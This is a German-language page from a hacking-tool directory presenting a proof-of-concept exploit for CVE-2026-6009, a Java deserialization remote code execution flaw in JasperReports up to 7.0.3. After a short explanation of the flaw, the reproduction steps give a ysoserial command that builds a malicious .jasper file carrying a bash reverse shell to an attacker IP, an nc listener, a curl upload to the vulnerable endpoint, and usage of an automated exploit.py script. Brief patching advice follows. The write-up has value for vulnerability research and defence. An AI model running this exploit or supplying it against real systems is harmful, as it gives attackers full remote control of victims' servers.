Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6009 — Automatisierter PoC-Exploit für CVE-2026-6009, eine Java-Deserialisierungs-RCE in Jaspersoft Reports <=7.0.3. Erzeugt schädliche .jasper-Payloads über ysoserial und liefert eine Reverse Shell über den Datei-Upload-Endpunkt. | Kitploit
Tools/GitHubGitHub/pumila03/cve-2026-6009
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubpumila03/cve-2026-6009

CVE-2026-6009

Automatisierter PoC-Exploit für CVE-2026-6009, eine Java-Deserialisierungs-RCE in Jaspersoft Reports <=7.0.3. Erzeugt schädliche .jasper-Payloads über ysoserial und liefert eine Reverse Shell über den Datei-Upload-Endpunkt.

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

⚠️ Haftungsausschluss: Dieses Repository dient nur zu Bildungszwecken und für autorisierte Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.

CVE-2026-6009

Proof of Concept

Zusammenfassung

Die Bibliothek Jaspersoft report in Version <= 7.0.3 ist anfällig für eine Remote-Code-Ausführung (RCE) durch Ausnutzung des Java-Deserialisierungsablaufs. Diese Schwachstelle ermöglicht es einem Angreifer, eine Verbindung mit einer Reverse Shell auf dem System herzustellen, das diese Version der Bibliothek verwendet.

  • Bibliothek: Jaspersoft report
  • Betroffene Version: <= 7.0.3
  • Schwachstellentyp: RCE über Java-Deserialisierung
  • CVE-2026-6009
  • CVSS-Score: 8.7 (Hoch)
  • Datum: 2026-05-19

Beschreibung der Schwachstelle

Um Daten zu übertragen, müssen einige Systeme Objekte in ein bestimmtes übertragbares Format umwandeln – dies ist die Serialisierung. Die Deserialisierung ist die umgekehrte Operation. In Java liegt der anfällige Mechanismus in ObjectInputStream.readObject(), das verwendet wird, um beliebige Objekte aus einem Eingabestrom zu deserialisieren. Da JRLoader.loadObject() diese Methode zum Lesen von .jasper-Dateien in der Jaspersoft-Bibliothek verwendet, stellt dies eine gefährliche Eintrittsmöglichkeit für bösartigen Code dar.

Allein readObject() reicht nicht aus, um Code auszulösen. Es funktioniert nur bei bekannten ausnutzbaren Klassen. Angreifer verwenden daher bekannte Gadget Chains wie CommonCollection, um die Ausführung ihrer Payloads zu erreichen.

Umgebung

Um einen Proof of Concept (PoC) erstellen zu können, habe ich ein Labor auf einer Parrot-Maschine mit einem Java-Webserver eingerichtet, der die Jaspersoft-Report-Bibliothek verwendet:

  • Betriebssystem: Parrot OS 7 GNU/Linux
  • Framework: Spring Boot Version 2.7.18
  • Abhängigkeit: Jasperreports Version 7.0.3
  • Umgebung: Java 11
  • Compiler: Maven

Beispiel für anfälligen Code:

root@kitploit:~
@PostMapping("/upload-report")
    public String uploadReport(@RequestParam("file") MultipartFile file) {
        try {
            InputStream is = file.getInputStream();

            // ObjectInputStream.readObject() appelé en interne par JRLoader
            JasperReport report = (JasperReport) JRLoader.loadObject(is);
            ...

Schritte zur Reproduktion

  1. Analyse

Im ersten Schritt, sobald Sie wissen, dass Ihr Zielsystem eine anfällige Version von Jasperreports verwendet, müssen Sie den genauen Zielort ermitteln, an dem das Ziel die Jasper-Datei empfängt.

In dieser Umgebung ist es http://localhost:8080/upload-report

  1. Überprüfung auf Schwachstelle

Dann müssen Sie einen Weg finden, herauszufinden, welche Klasse als Gadget Chain im Zielsystem verwendet werden kann. Sie können auch einige ausprobieren und sehen, welche das System auslöst.

In einem Whitebox-Kontext können wir diese Informationen selbst suchen:

root@kitploit:~
mvn dependency:tree | grep -i "commons\|spring\|groovy\|beanshell"

Wir stellen fest, dass das System CommonsCollections verwendet.

  1. Payload generieren

Für CommonsCollections verwenden Sie das ysoserial-Skript, um den gewünschten Payload zu generieren. Hier erstellen Sie eine Reverse Shell:

root@kitploit:~
java -jar ysoserial.jar CommonsCollections5 "/bin/bash -i >& /dev/tcp/IP_SOURCE/PORT 0>&1" > file.jasper

Sie müssen wahrscheinlich mehrere Versionen von CommonCollections testen, um die Payload-Ausführung zu erreichen.

  1. Exploit vorbereiten

Um eine Reverse-Shell-Verbindung herzustellen, müssen wir auf einem Port lauschen, um die vom Payload initiierte Verbindung vom Zielsystem zu empfangen:

root@kitploit:~
nc -lnvp 4444
  1. Exploit ausführen

Schließlich müssen Sie nur den erstellten Payload an die gefundene Stelle senden und Ihren Port überprüfen, um zu bestätigen, dass die Verbindung vom Zielsystem hergestellt wurde:

root@kitploit:~
curl -X POST http://localhost:8080/upload-report -F "[email protected]"

Auswirkungen

Ein Angreifer mit Zugriff auf den Endpunkt könnte beliebigen Code mit Serverrechten ausführen, was zu einer vollständigen Kompromittierung des Systems führen könnte.

Empfehlungen zur Behebung

  • Aktualisieren Sie JasperReports auf Version 7.0.4+
  • Deserialisieren Sie niemals .jasper-Dateien aus unbekannter Quelle
  • Implementieren Sie eine Whitelist für autorisierte Klassen

Skript

Beschreibung

exploit.py ist ein automatisiertes Skript, um die Ausnutzung der Schwachstelle CVE-2026-6009 zu reproduzieren.

Verwendung

root@kitploit:~
python3 exploit.py -t TARGET -s IP_SOURCE -p PORT
python3 exploit.py -t http://localhost:8080/upload-report -s 192.168.1.1 -p 4444

Optionen

FlagBeschreibung
-t, --targetOrt, an dem die .jasper-Datei hochgeladen werden soll.
-s, --sourceIhre IP-Adresse.
-p, --portDer Port, mit dem die Reverse Shell verbunden werden soll.
Tool herunterladen